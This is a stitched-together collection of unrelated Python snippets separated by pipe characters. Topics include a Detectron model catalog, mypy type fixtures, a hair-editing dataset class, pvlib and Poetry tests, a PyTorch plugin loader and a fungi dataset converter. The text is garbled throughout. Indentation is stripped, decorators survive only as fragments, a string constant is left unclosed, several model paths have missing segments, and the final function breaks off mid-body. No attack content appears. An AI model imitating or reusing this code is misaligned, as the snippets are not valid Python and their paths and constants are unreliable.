def _compute_values(self) -> List[float]:
return self.get_lr() |
class ModelCatalog(object):
S3_C2_DETECTRON_PREFIX = '
C2_IMAGENET_MODELS = {'MSRA/R-50': 'ImageNetPretrained/MSRA/R-50.pkl', 'MSRA/R-101': 'ImageNetPretrained/MSRA/R-101.pkl', 'FAIR/R-50-GN': 'ImageNetPretrained//R-50-GN.pkl', 'FAIR/R-101-GN': 'ImageNetPretrained//R-101-GN.pkl', 'FAIR/X-101-32x8d': 'ImageNetPretrained//X-101-32x8d.pkl', 'FAIR/X-101-64x4d': 'ImageNetPretrained/FBResNeXt/X-101-64x4d.pkl', 'FAIR/X-152-32x8d-IN5k': 'ImageNetPretrained//X-152-32x8d-IN5k.pkl'}
C2_DETECTRON_PATH_FORMAT = '{prefix}/{url}/output/train/{dataset}/{type}/model_final.pkl'
C2_DATASET_COCO = 'coco_2014_train%3Acoco_2014_valminusminival'
C2_DATASET_COCO_KEYPOINTS = 'keypoints_coco_2014_train%3Akeypoints_coco_2014_valminusminival'
C2_DETECTRON_MODELS = {'/e2e_faster_rcnn_R-50-C4_1x': '/12_2017_baselines/e2e_faster_rcnn_R-50-C4_1x.yaml.01_33_49.iAX0mXvW', '/e2e_faster_rcnn_R-50-FPN_1x': '/12_2017_baselines/e2e_faster_rcnn_R-50-FPN_1x.yaml.01_36_30.cUF7QR7I', '/e2e_faster_rcnn_R-101-FPN_1x': '/12_2017_baselines/e2e_faster_rcnn_R-101-FPN_1x.yaml.01_38_50.sNxI7sX7', '/e2e_faster_rcnn_X-101-32x8d-FPN_1x': '/12_2017_baselines/e2e_faster_rcnn_X-101-32x8d-FPN_1x.yaml.06_31_39.5MIHi1fZ', '/e2e_mask_rcnn_R-50-C4_1x': '/12_2017_baselines/e2e_mask_rcnn_R-50-C4_1x.yaml.01_45_57.ZgkA7hPB', '/e2e_mask_rcnn_R-50-FPN_1x': '/12_2017_baselines/e2e_mask_rcnn_R-50-FPN_1x.yaml.01_48_14.DzEQe4wC', '/e2e_mask_rcnn_R-101-FPN_1x': '/12_2017_baselines/e2e_mask_rcnn_R-101-FPN_1x.yaml.02_31_37.KqyEK4tT', '/e2e_mask_rcnn_X-101-32x8d-FPN_1x': '/12_2017_baselines/e2e_mask_rcnn_X-101-32x8d-FPN_1x.yaml.06_35_59.RZotkLKI', '/e2e_mask_rcnn_R-50-FPN_2x_gn': 'GN//04_2018_gn_baselines/e2e_mask_rcnn_R-50-FPN_2x_gn_0416.13_23_38.bTlTI97Q', '/e2e_keypoint_rcnn_R-50-FPN_1x': '/12_2017_baselines/e2e_keypoint_rcnn_R-50-FPN_1x.yaml.08_42_54.kdzV35ao', '/rpn_R-50-C4_1x': '/12_2017_baselines/rpn_R-50-C4_1x.yaml.08_00_43.njH5oD9L', '/rpn_R-50-FPN_1x': '/12_2017_baselines/rpn_R-50-FPN_1x.yaml.08_06_03.Axg0r179', '/fast_R-50-FPN_1x': '/12_2017_baselines/fast_rcnn_R-50-FPN_1x.yaml.08_39_09.L3obSdQ2'}
def get(name):
if name.startswith('Caffe2Detectron/COCO'):
return ModelCatalog._get_c2_detectron_baseline(name)
if name.startswith('ImageNetPretrained/'):
return ModelCatalog._get_c2_imagenet_pretrained(name)
raise RuntimeError('model not present in the catalog: {}'.format(name))
def _get_c2_imagenet_pretrained(name):
prefix = ModelCatalog.S3_C2_DETECTRON_PREFIX
name = name[len('ImageNetPretrained/'):]
name = ModelCatalog.C2_IMAGENET_MODELS[name]
url = '/'.join([prefix, name])
return url
def _get_c2_detectron_baseline(name):
name = name[len('Caffe2Detectron/COCO/'):]
url = ModelCatalog.C2_DETECTRON_MODELS[name]
if ('keypoint_rcnn' in name):
dataset = ModelCatalog.C2_DATASET_COCO_KEYPOINTS
else:
dataset = ModelCatalog.C2_DATASET_COCO
if ('/rpn_R-50-C4_1x' in name):
type = 'rpn'
else:
type = 'generalized_rcnn'
url = ModelCatalog.C2_DETECTRON_PATH_FORMAT.format(prefix=ModelCatalog.S3_C2_DETECTRON_PREFIX, url=url, type=type, dataset=dataset)
return url |
def balanceproof_from_envelope(envelope_message: EnvelopeMessage) -> BalanceProofSignedState:
assert envelope_message.sender, 'envelope_message must be signed'
return BalanceProofSignedState(nonce=envelope_message.nonce, transferred_amount=envelope_message.transferred_amount, locked_amount=envelope_message.locked_amount, locksroot=envelope_message.locksroot, message_hash=AdditionalHash(envelope_message.message_hash), signature=envelope_message.signature, sender=envelope_message.sender, canonical_identifier=CanonicalIdentifier(chain_identifier=envelope_message.chain_id, token_network_address=envelope_message.token_network_address, channel_identifier=envelope_message.channel_identifier)) |
class LatentsDatasetInference(Dataset):
def __init__(self, latents, opts):
self.latents = latents
self.opts = opts
if ((self.opts.editing_type in ['hairstyle', 'both']) and (self.opts.input_type.split('_')[0] == 'text')):
with open(self.opts.hairstyle_description, 'r') as fd:
self.hairstyle_description_list = fd.read().splitlines()
self.hairstyle_list = [single_hairstyle_description[:(- 9)] for single_hairstyle_description in self.hairstyle_description_list]
if ((self.opts.editing_type in ['color', 'both']) and (self.opts.input_type.split('_')[(- 1)] == 'text')):
self.color_list = [(single_color_description.strip() + ' ') for single_color_description in self.opts.color_description.split(',')]
if ((self.opts.editing_type in ['hairstyle', 'both']) and (self.opts.input_type.split('_')[0] == 'image')):
self.out_domain_hairstyle_img_path_list = sorted(train_utils.make_dataset(self.opts.hairstyle_ref_img_test_path))
if ((self.opts.editing_type in ['color', 'both']) and (self.opts.input_type.split('_')[(- 1)] == 'image')):
self.out_domain_color_img_path_list = sorted(train_utils.make_dataset(self.opts.color_ref_img_test_path))
self.image_transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])])
def manipulate_hairstyle(self, index):
if (self.opts.input_type.split('_')[0] == 'text'):
color_text_embedding_list = [torch.Tensor([0]) for i in range(len(self.hairstyle_list))]
color_tensor_list = [torch.Tensor([0]) for i in range(len(self.hairstyle_list))]
hairstyle_tensor_list = [torch.Tensor([0]) for i in range(len(self.hairstyle_list))]
selected_hairstyle_description_list = [(single_hairstyle_description + 'hairstyle') for single_hairstyle_description in self.hairstyle_list]
hairstyle_text_embedding_list = [torch.cat([clip.tokenize(selected_hairstyle_description)])[0] for selected_hairstyle_description in selected_hairstyle_description_list]
elif (self.opts.input_type.split('_')[0] == 'image'):
color_text_embedding_list = [torch.Tensor([0]) for i in range(self.opts.num_of_ref_img)]
color_tensor_list = [torch.Tensor([0]) for i in range(self.opts.num_of_ref_img)]
hairstyle_text_embedding_list = [torch.Tensor([0]) for i in range(self.opts.num_of_ref_img)]
selected_hairstyle_description_list = ['hairstyle_out_domain_ref' for i in range(self.opts.num_of_ref_img)]
hairstyle_tensor_list = [self.image_transform(Image.open(random.choice(self.out_domain_hairstyle_img_path_list))) for i in range(self.opts.num_of_ref_img)]
return (self.latents[index], hairstyle_text_embedding_list, color_text_embedding_list, selected_hairstyle_description_list, hairstyle_tensor_list, color_tensor_list)
def manipulater_color(self, index):
if (self.opts.input_type.split('_')[(- 1)] == 'text'):
hairstyle_text_embedding_list = [torch.Tensor([0]) for i in range(len(self.color_list))]
hairstyle_tensor_list = [torch.Tensor([0]) for i in range(len(self.color_list))]
color_tensor_list = [torch.Tensor([0]) for i in range(len(self.color_list))]
selected_color_description_list = [(single_color_description + 'hair') for single_color_description in self.color_list]
color_text_embedding_list = [torch.cat([clip.tokenize(selected_color_description)])[0] for selected_color_description in selected_color_description_list]
elif (self.opts.input_type.split('_')[(- 1)] == 'image'):
hairstyle_text_embedding_list = [torch.Tensor([0]) for i in range(self.opts.num_of_ref_img)]
hairstyle_tensor_list = [torch.Tensor([0]) for i in range(self.opts.num_of_ref_img)]
color_text_embedding_list = [torch.Tensor([0]) for i in range(self.opts.num_of_ref_img)]
selected_color_description_list = ['color_out_domain_ref' for i in range(self.opts.num_of_ref_img)]
color_tensor_list = [self.image_transform(Image.open(random.choice(self.out_domain_color_img_path_list))) for i in range(self.opts.num_of_ref_img)]
return (self.latents[index], hairstyle_text_embedding_list, color_text_embedding_list, selected_color_description_list, hairstyle_tensor_list, color_tensor_list)
def manipulater_hairstyle_and_color(self, index):
(returned_latent, hairstyle_text_embedding_list, _, selected_hairstyle_description_list, hairstyle_tensor_list, _) = self.manipulate_hairstyle(index)
(_, _, color_text_embedding_list, selected_color_description_list, _, color_tensor_list) = self.manipulater_color(index)
hairstyle_text_embedding_final_list = [hairstyle_text_embedding for hairstyle_text_embedding in hairstyle_text_embedding_list for i in color_text_embedding_list]
color_text_embedding_final_list = [color_text_embedding for i in hairstyle_text_embedding_list for color_text_embedding in color_text_embedding_list]
selected_description_list = [f'{selected_hairstyle_description}-{selected_color_description}' for selected_hairstyle_description in selected_hairstyle_description_list for selected_color_description in selected_color_description_list]
hairstyle_tensor_final_list = [hairstyle_tensor for hairstyle_tensor in hairstyle_tensor_list for i in color_tensor_list]
color_tensor_final_list = [color_tensor for i in hairstyle_tensor_list for color_tensor in color_tensor_list]
return (returned_latent, hairstyle_text_embedding_final_list, color_text_embedding_final_list, selected_description_list, hairstyle_tensor_final_list, color_tensor_final_list)
def __len__(self):
return self.latents.shape[0]
def __getitem__(self, index):
if (self.opts.editing_type == 'hairstyle'):
return self.manipulate_hairstyle(index)
elif (self.opts.editing_type == 'color'):
return self.manipulater_color(index)
elif (self.opts.editing_type == 'both'):
return self.manipulater_hairstyle_and_color(index) |
class DumperProvider(ProviderWithAttachableRC, ABC):
_provision_action
def _outer_provide_dumper(self, mediator: Mediator, request: DumperRequest):
self._request_checker.check_request(mediator, request)
return self._provide_dumper(mediator, request)
def _provide_dumper(self, mediator: Mediator, request: DumperRequest) -> Dumper:
... |
.parametrize('temp_model', ['sapm_temp', 'faiman_temp', 'pvsyst_temp', 'fuentes_temp', 'noct_sam_temp'])
def test_infer_temp_model(location, sapm_dc_snl_ac_system, pvwatts_dc_pvwatts_ac_pvsyst_temp_system, pvwatts_dc_pvwatts_ac_faiman_temp_system, pvwatts_dc_pvwatts_ac_fuentes_temp_system, pvwatts_dc_pvwatts_ac_noct_sam_temp_system, temp_model):
dc_systems = {'sapm_temp': sapm_dc_snl_ac_system, 'pvsyst_temp': pvwatts_dc_pvwatts_ac_pvsyst_temp_system, 'faiman_temp': pvwatts_dc_pvwatts_ac_faiman_temp_system, 'fuentes_temp': pvwatts_dc_pvwatts_ac_fuentes_temp_system, 'noct_sam_temp': pvwatts_dc_pvwatts_ac_noct_sam_temp_system}
system = dc_systems[temp_model]
mc = ModelChain(system, location, aoi_model='physical', spectral_model='no_loss')
assert (temp_model == mc.temperature_model.__name__)
assert isinstance(mc, ModelChain) |
def test_estimates_expectation_value_pauli_nonoise():
evals = numpy.array([(- 1), (+ 1)])
true_amps = numpy.array([0.2, 0.8])
true_expectation_value = numpy.dot(evals, true_amps)
estimator = PhaseFitEstimator(evals)
sim_points = estimator.get_simulation_points()
phase_function = numpy.array([numpy.sum([(amp * numpy.exp(((1j * ev) * time))) for (ev, amp) in zip(evals, true_amps)]) for time in sim_points])
print(phase_function)
test_expectation_value = estimator.get_expectation_value(phase_function)
assert numpy.isclose(true_expectation_value, test_expectation_value) |
def _test_dataframe_shuffle(backend, protocol, n_workers, _partitions):
if (backend == 'cudf'):
cudf = pytest.importorskip('cudf')
with LocalCluster(protocol=protocol, dashboard_address=None, n_workers=n_workers, threads_per_worker=1, worker_class=IncreasedCloseTimeoutNanny, processes=True) as cluster:
with Client(cluster) as client:
all_workers = list(client.get_worker_logs().keys())
comms.default_comms()
np.random.seed(42)
df = pd.DataFrame({'key': np.random.random(100)})
if (backend == 'cudf'):
df = cudf.DataFrame.from_pandas(df)
if _partitions:
df['_partitions'] = 0
for input_nparts in range(1, 5):
for output_nparts in range(1, 5):
ddf = dd.from_pandas(df.copy(), npartitions=input_nparts).persist(workers=all_workers)
for batchsize in ((- 1), 1, 2):
with dask.config.set(explicit_comms_batchsize=batchsize):
ddf = explicit_comms_shuffle(ddf, (['_partitions'] if _partitions else ['key']), npartitions=output_nparts, batchsize=batchsize).persist()
assert (ddf.npartitions == output_nparts)
if _partitions:
assert_eq(ddf.partitions[0].compute(), df)
assert all(((len(ddf.partitions[i].compute()) == 0) for i in range(1, ddf.npartitions)))
else:
result = ddf.map_partitions(check_partitions, output_nparts).compute()
assert all(result.to_list())
expected = df.sort_values('key')
got = ddf.compute().sort_values('key')
assert_eq(got, expected) |
def find_occurrences(project, resource, offset, unsure=False, resources=None, in_hierarchy=False, task_handle=taskhandle.DEFAULT_TASK_HANDLE):
name = worder.get_name_at(resource, offset)
this_pymodule = project.get_pymodule(resource)
(primary, pyname) = evaluate.eval_location2(this_pymodule, offset)
def is_match(occurrence):
return unsure
finder = occurrences.create_finder(project, name, pyname, unsure=is_match, in_hierarchy=in_hierarchy, instance=primary)
if (resources is None):
resources = project.get_python_files()
job_set = task_handle.create_jobset('Finding Occurrences', count=len(resources))
return _find_locations(finder, resources, job_set) |
class TypeFixture():
def __init__(self, variance: int=COVARIANT) -> None:
self.oi = self.make_type_info('builtins.object')
self.o = Instance(self.oi, [])
def make_type_var(name: str, id: int, values: list[Type], upper_bound: Type, variance: int) -> TypeVarType:
return TypeVarType(name, name, id, values, upper_bound, AnyType(TypeOfAny.from_omitted_generics), variance)
self.t = make_type_var('T', 1, [], self.o, variance)
self.tf = make_type_var('T', (- 1), [], self.o, variance)
self.tf2 = make_type_var('T', (- 2), [], self.o, variance)
self.s = make_type_var('S', 2, [], self.o, variance)
self.s1 = make_type_var('S', 1, [], self.o, variance)
self.sf = make_type_var('S', (- 2), [], self.o, variance)
self.sf1 = make_type_var('S', (- 1), [], self.o, variance)
self.u = make_type_var('U', 3, [], self.o, variance)
self.anyt = AnyType(TypeOfAny.special_form)
self.nonet = NoneType()
self.uninhabited = UninhabitedType()
self.fi = self.make_type_info('F', is_abstract=True)
self.f2i = self.make_type_info('F2', is_abstract=True)
self.f3i = self.make_type_info('F3', is_abstract=True, mro=[self.fi])
self.std_tuplei = self.make_type_info('builtins.tuple', mro=[self.oi], typevars=['T'], variances=[COVARIANT])
self.type_typei = self.make_type_info('builtins.type')
self.bool_type_info = self.make_type_info('builtins.bool')
self.str_type_info = self.make_type_info('builtins.str')
self.functioni = self.make_type_info('builtins.function')
self.ai = self.make_type_info('A', mro=[self.oi])
self.bi = self.make_type_info('B', mro=[self.ai, self.oi])
self.ci = self.make_type_info('C', mro=[self.ai, self.oi])
self.di = self.make_type_info('D', mro=[self.oi])
self.ei = self.make_type_info('E', mro=[self.fi, self.oi])
self.e2i = self.make_type_info('E2', mro=[self.f2i, self.fi, self.oi])
self.e3i = self.make_type_info('E3', mro=[self.fi, self.f2i, self.oi])
self.gi = self.make_type_info('G', mro=[self.oi], typevars=['T'], variances=[variance])
self.g2i = self.make_type_info('G2', mro=[self.oi], typevars=['T'], variances=[variance])
self.hi = self.make_type_info('H', mro=[self.oi], typevars=['S', 'T'], variances=[variance, variance])
self.gsi = self.make_type_info('GS', mro=[self.gi, self.oi], typevars=['T', 'S'], variances=[variance, variance], bases=[Instance(self.gi, [self.s])])
self.gs2i = self.make_type_info('GS2', mro=[self.gi, self.oi], typevars=['S'], variances=[variance], bases=[Instance(self.gi, [self.s1])])
self.std_listi = self.make_type_info('builtins.list', mro=[self.oi], typevars=['T'], variances=[variance])
self.std_tuple = Instance(self.std_tuplei, [self.anyt])
self.type_type = Instance(self.type_typei, [])
self.function = Instance(self.functioni, [])
self.str_type = Instance(self.str_type_info, [])
self.bool_type = Instance(self.bool_type_info, [])
self.a = Instance(self.ai, [])
self.b = Instance(self.bi, [])
self.c = Instance(self.ci, [])
self.d = Instance(self.di, [])
self.e = Instance(self.ei, [])
self.e2 = Instance(self.e2i, [])
self.e3 = Instance(self.e3i, [])
self.f = Instance(self.fi, [])
self.f2 = Instance(self.f2i, [])
self.f3 = Instance(self.f3i, [])
self.ga = Instance(self.gi, [self.a])
self.gb = Instance(self.gi, [self.b])
self.gd = Instance(self.gi, [self.d])
self.go = Instance(self.gi, [self.o])
self.gt = Instance(self.gi, [self.t])
self.gtf = Instance(self.gi, [self.tf])
self.gtf2 = Instance(self.gi, [self.tf2])
self.gs = Instance(self.gi, [self.s])
self.gdyn = Instance(self.gi, [self.anyt])
self.gn = Instance(self.gi, [NoneType()])
self.g2a = Instance(self.g2i, [self.a])
self.gsaa = Instance(self.gsi, [self.a, self.a])
self.gsab = Instance(self.gsi, [self.a, self.b])
self.gsba = Instance(self.gsi, [self.b, self.a])
self.gs2a = Instance(self.gs2i, [self.a])
self.gs2b = Instance(self.gs2i, [self.b])
self.gs2d = Instance(self.gs2i, [self.d])
self.hab = Instance(self.hi, [self.a, self.b])
self.haa = Instance(self.hi, [self.a, self.a])
self.hbb = Instance(self.hi, [self.b, self.b])
self.hts = Instance(self.hi, [self.t, self.s])
self.had = Instance(self.hi, [self.a, self.d])
self.hao = Instance(self.hi, [self.a, self.o])
self.lsta = Instance(self.std_listi, [self.a])
self.lstb = Instance(self.std_listi, [self.b])
self.lit1 = LiteralType(1, self.a)
self.lit2 = LiteralType(2, self.a)
self.lit3 = LiteralType('foo', self.d)
self.lit4 = LiteralType(4, self.a)
self.lit1_inst = Instance(self.ai, [], last_known_value=self.lit1)
self.lit2_inst = Instance(self.ai, [], last_known_value=self.lit2)
self.lit3_inst = Instance(self.di, [], last_known_value=self.lit3)
self.lit4_inst = Instance(self.ai, [], last_known_value=self.lit4)
self.lit_str1 = LiteralType('x', self.str_type)
self.lit_str2 = LiteralType('y', self.str_type)
self.lit_str3 = LiteralType('z', self.str_type)
self.lit_str1_inst = Instance(self.str_type_info, [], last_known_value=self.lit_str1)
self.lit_str2_inst = Instance(self.str_type_info, [], last_known_value=self.lit_str2)
self.lit_str3_inst = Instance(self.str_type_info, [], last_known_value=self.lit_str3)
self.lit_false = LiteralType(False, self.bool_type)
self.lit_true = LiteralType(True, self.bool_type)
self.type_a = TypeType.make_normalized(self.a)
self.type_b = TypeType.make_normalized(self.b)
self.type_c = TypeType.make_normalized(self.c)
self.type_d = TypeType.make_normalized(self.d)
self.type_t = TypeType.make_normalized(self.t)
self.type_any = TypeType.make_normalized(self.anyt)
self._add_bool_dunder(self.bool_type_info)
self._add_bool_dunder(self.ai)
self.ub = make_type_var('UB', 5, [], self.b, variance)
self.uc = make_type_var('UC', 6, [], self.c, variance)
def make_type_var_tuple(name: str, id: int, upper_bound: Type) -> TypeVarTupleType:
return TypeVarTupleType(name, name, id, upper_bound, self.std_tuple, AnyType(TypeOfAny.from_omitted_generics))
obj_tuple = self.std_tuple.copy_modified(args=[self.o])
self.ts = make_type_var_tuple('Ts', 1, obj_tuple)
self.ss = make_type_var_tuple('Ss', 2, obj_tuple)
self.us = make_type_var_tuple('Us', 3, obj_tuple)
self.gvi = self.make_type_info('GV', mro=[self.oi], typevars=['Ts'], typevar_tuple_index=0)
self.gv2i = self.make_type_info('GV2', mro=[self.oi], typevars=['T', 'Ts', 'S'], typevar_tuple_index=1)
def _add_bool_dunder(self, type_info: TypeInfo) -> None:
signature = CallableType([], [], [], Instance(self.bool_type_info, []), self.function)
bool_func = FuncDef('__bool__', [], Block([]))
bool_func.type = set_callable_name(signature, bool_func)
type_info.names[bool_func.name] = SymbolTableNode(MDEF, bool_func)
def callable(self, *a: Type) -> CallableType:
return CallableType(list(a[:(- 1)]), ([ARG_POS] * (len(a) - 1)), ([None] * (len(a) - 1)), a[(- 1)], self.function)
def callable_type(self, *a: Type) -> CallableType:
return CallableType(list(a[:(- 1)]), ([ARG_POS] * (len(a) - 1)), ([None] * (len(a) - 1)), a[(- 1)], self.type_type)
def callable_default(self, min_args: int, *a: Type) -> CallableType:
n = (len(a) - 1)
return CallableType(list(a[:(- 1)]), (([ARG_POS] * min_args) + ([ARG_OPT] * (n - min_args))), ([None] * n), a[(- 1)], self.function)
def callable_var_arg(self, min_args: int, *a: Type) -> CallableType:
n = (len(a) - 1)
return CallableType(list(a[:(- 1)]), ((([ARG_POS] * min_args) + ([ARG_OPT] * ((n - 1) - min_args))) + [ARG_STAR]), ([None] * n), a[(- 1)], self.function)
def make_type_info(self, name: str, module_name: (str | None)=None, is_abstract: bool=False, mro: (list[TypeInfo] | None)=None, bases: (list[Instance] | None)=None, typevars: (list[str] | None)=None, typevar_tuple_index: (int | None)=None, variances: (list[int] | None)=None) -> TypeInfo:
class_def = ClassDef(name, Block([]), None, [])
class_def.fullname = name
if (module_name is None):
if ('.' in name):
module_name = name.rsplit('.', 1)[0]
else:
module_name = '__main__'
if typevars:
v: list[TypeVarLikeType] = []
for (id, n) in enumerate(typevars, 1):
if ((typevar_tuple_index is not None) and ((id - 1) == typevar_tuple_index)):
v.append(TypeVarTupleType(n, n, id, self.std_tuple.copy_modified(args=[self.o]), self.std_tuple.copy_modified(args=[self.o]), AnyType(TypeOfAny.from_omitted_generics)))
else:
if variances:
variance = variances[(id - 1)]
else:
variance = COVARIANT
v.append(TypeVarType(n, n, id, [], self.o, AnyType(TypeOfAny.from_omitted_generics), variance=variance))
class_def.type_vars = v
info = TypeInfo(SymbolTable(), class_def, module_name)
if (mro is None):
mro = []
if (name != 'builtins.object'):
mro.append(self.oi)
info.mro = ([info] + mro)
if (bases is None):
if mro:
bases = [Instance(mro[0], [])]
else:
bases = []
info.bases = bases
return info
def def_alias_1(self, base: Instance) -> tuple[(TypeAliasType, Type)]:
A = TypeAliasType(None, [])
target = Instance(self.std_tuplei, [UnionType([base, A])])
AN = TypeAlias(target, '__main__.A', (- 1), (- 1))
A.alias = AN
return (A, target)
def def_alias_2(self, base: Instance) -> tuple[(TypeAliasType, Type)]:
A = TypeAliasType(None, [])
target = UnionType([base, Instance(self.std_tuplei, [A])])
AN = TypeAlias(target, '__main__.A', (- 1), (- 1))
A.alias = AN
return (A, target)
def non_rec_alias(self, target: Type, alias_tvars: (list[TypeVarLikeType] | None)=None, args: (list[Type] | None)=None) -> TypeAliasType:
AN = TypeAlias(target, '__main__.A', (- 1), (- 1), alias_tvars=alias_tvars)
if (args is None):
args = []
return TypeAliasType(AN, args) |
def test_none_activated(tester: CommandTester, venvs_in_cache_dirs: list[str], mocker: MockerFixture, env: MockEnv) -> None:
mocker.patch('poetry.utils.env.EnvManager.get', return_value=env)
tester.execute()
expected = '\n'.join(venvs_in_cache_dirs)
assert (tester.io.fetch_output().strip() == expected) |
def get_plugin(module_name, sources, **build_kwargs):
assert (verbosity in ['none', 'brief', 'full'])
if (module_name in _cached_plugins):
return _cached_plugins[module_name]
if (verbosity == 'full'):
print(f'Setting up PyTorch plugin "{module_name}"...')
elif (verbosity == 'brief'):
print(f'Setting up PyTorch plugin "{module_name}"... ', end='', flush=True)
try:
if ((os.name == 'nt') and (os.system('where cl.exe >nul 2>nul') != 0)):
compiler_bindir = _find_compiler_bindir()
if (compiler_bindir is None):
raise RuntimeError(f'Could not find MSVC/GCC/CLANG installation on this computer. Check _find_compiler_bindir() in "{__file__}".')
os.environ['PATH'] += (';' + compiler_bindir)
elif (os.name == 'posix'):
compiler_bindir = _find_compiler_bindir_posix()
if (compiler_bindir is None):
raise RuntimeError(f'Could not find NVCC installation on this computer. Check _find_compiler_bindir_posix() in "{__file__}".')
os.environ['PATH'] += (';' + compiler_bindir)
verbose_build = (verbosity == 'full')
source_dirs_set = set((os.path.dirname(source) for source in sources))
if ((len(source_dirs_set) == 1) and ('TORCH_EXTENSIONS_DIR' in os.environ)):
all_source_files = sorted(list((x for x in Path(list(source_dirs_set)[0]).iterdir() if x.is_file())))
hash_md5 = hashlib.md5()
for src in all_source_files:
with open(src, 'rb') as f:
hash_md5.update(f.read())
build_dir = torch.utils.cpp_extension._get_build_directory(module_name, verbose=verbose_build)
digest_build_dir = os.path.join(build_dir, hash_md5.hexdigest())
if (not os.path.isdir(digest_build_dir)):
os.makedirs(digest_build_dir, exist_ok=True)
baton = FileBaton(os.path.join(digest_build_dir, 'lock'))
if baton.try_acquire():
try:
for src in all_source_files:
shutil.copyfile(src, os.path.join(digest_build_dir, os.path.basename(src)))
finally:
baton.release()
else:
baton.wait()
digest_sources = [os.path.join(digest_build_dir, os.path.basename(x)) for x in sources]
torch.utils.cpp_extension.load(name=module_name, build_directory=build_dir, verbose=verbose_build, sources=digest_sources, **build_kwargs)
else:
torch.utils.cpp_extension.load(name=module_name, verbose=verbose_build, sources=sources, **build_kwargs)
module = importlib.import_module(module_name)
except:
if (verbosity == 'brief'):
print('Failed!')
raise
if (verbosity == 'full'):
print(f'Done setting up PyTorch plugin "{module_name}".')
elif (verbosity == 'brief'):
print('Done.')
_cached_plugins[module_name] = module
return module |
def get_walks_union_ops(forward_seed_ops, backward_seed_ops, forward_inclusive=True, backward_inclusive=True, within_ops=None, within_ops_fn=None, control_inputs=False, control_outputs=None, control_ios=None):
(control_inputs, control_outputs) = check_cios(control_inputs, control_outputs, control_ios)
forward_ops = get_forward_walk_ops(forward_seed_ops, inclusive=forward_inclusive, within_ops=within_ops, within_ops_fn=within_ops_fn, control_outputs=control_outputs)
backward_ops = get_backward_walk_ops(backward_seed_ops, inclusive=backward_inclusive, within_ops=within_ops, within_ops_fn=within_ops_fn, control_inputs=control_inputs)
return util.concatenate_unique(forward_ops, backward_ops) |
class FungiConverter(DatasetConverter):
NUM_TRAIN_CLASSES = 994
NUM_VALID_CLASSES = 200
NUM_TEST_CLASSES = 200
def create_splits(self):
with tf.io.gfile.GFile(os.path.join(self.data_root, 'train.json')) as f:
original_train = json.load(f)
with tf.io.gfile.GFile(os.path.join(self.data_root, 'val.json')) as f:
original_val = json.load(f)
assert (original_train['categories'] == original_val['categories'])
categories = sorted(original_train['categories'], key=operator.itemgetter('id'))
assert ([category['id'] for category in categories] == list(range(len(categories))))
labels = ['{:04d}.{}'.format(category['id'], category['name']) for category in categories]
(train_inds, valid_inds, test_inds) = gen_rand_split_inds(self.NUM_TRAIN_CLASSES, self.NUM_VALID_CLASSES, self.NUM_TEST_CLASSES)
splits = {'train': [labels[i] for i in train_inds], 'valid': [labels[i] for i in valid_inds], 'test': [labels[i] for i in test_inds]}
return splits
def create_dataset_specification_and_records(self):
splits = self.get_splits()
train_classes = splits['train']
valid_classes = splits['valid']
test_classes = splits['test']
self.classes_per_split[learning_spec.Split.TRAIN] = len(train_classes)
self.classes_per_split[learning_spec.Split.VALID] = len(valid_classes)
self.classes_per_split[learning_spec.Split.TEST] = len(test_classes)
with tf.io.gfile.GFile(os.path.join(self.data_root, 'train.json')) as f:
original_train = json.load(f)
with tf.io.gfile.GFile(os.path.join(self.data_root, 'val.json')) as f:
original_val = json.load(f)
image_list = (original_train['images'] + original_val['images'])
image_id_dict = {}
for image in image_list:
assert (image['id'] not in image_id_dict)
image_id_dict[image['id']] = image
annotations = (original_train['annotations'] + original_val['annotations'])
for annotation in annotations:
assert ('class' not in image_id_dict[annotation['image_id']])
image_id_dict[annotation['image_id']]['class'] = annotation['category_id']
class_filepaths = collections.defaultdict(list)
for image in image_list:
class_filepaths[image['class']].append(os.path.join(self.data_root, image['file_name']))
all_classes = list(itertools.chain(train_classes, valid_classes, test_classes))
for (class_id, class_label) in enumerate(all_classes):
logging.info('Creating record for class ID %d (%s)...', class_id, class_label)
category_id = int(class_label[:4])
if (category_id not in class_filepaths):
raise ValueError(('class_filepaths does not contain paths to any image for category %d. Existing categories are: %s.' % (category_id, class_filepaths.keys())))
class_paths = class_filepaths[category_id]
class_records_path = os.path.join(self.records_path, self.dataset_spec.file_pattern.format(class_id))
self.class_names[class_id] = class_label
self.images_per_class[class_id] = len(class_paths)
write_tfrecord_from_image_files(class_paths, class_id, class_records_path) |
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.ca = ChannelAttention(planes)
self.sa = SpatialAttention()
self.downsample = downsample
self.stride = stride
self.inplanes = inplanes
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = (self.ca(out) * out)
out = (self.sa(out) * out)
if (self.downsample is not None):
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out |
def args_dict(args):
args.dataset = {'train': args.train, 'val': args.val, 'test': args.test, 'matching': args.matching}
args.setting = {'sample_rate': args.sample_rate, 'segment': args.segment, 'pad': args.pad, 'stride': args.set_stride}
args.manner = {'in_channels': args.in_channels, 'out_channels': args.out_channels, 'hidden': args.hidden, 'depth': args.depth, 'kernel_size': args.kernel_size, 'stride': args.stride, 'growth': args.growth, 'head': args.head, 'segment_len': args.segment_len}
args.ex_name = os.getcwd().replace('\\', '/').split('/')[(- 1)]
return args |
def get_params(opt, size):
(w, h) = size
new_h = h
new_w = w
if (opt.preprocess_mode == 'resize_and_crop'):
new_h = new_w = opt.load_size
elif (opt.preprocess_mode == 'scale_width_and_crop'):
new_w = opt.load_size
new_h = ((opt.load_size * h) // w)
elif (opt.preprocess_mode == 'scale_shortside_and_crop'):
(ss, ls) = (min(w, h), max(w, h))
width_is_shorter = (w == ss)
ls = int(((opt.load_size * ls) / ss))
(new_w, new_h) = ((ss, ls) if width_is_shorter else (ls, ss))
x = random.randint(0, np.maximum(0, (new_w - opt.crop_size)))
y = random.randint(0, np.maximum(0, (new_h - opt.crop_size)))
flip = (random.random() > 0.5)
return {'crop_pos': (x, y), 'flip': flip} |
def data_loader(rng: jax.random.PRNGKey, dataset: Dataset, batch_size: int, shuffle: bool=False, drop_last=True):
if shuffle:
batch_idx = jax.random.permutation(rng, len(dataset))
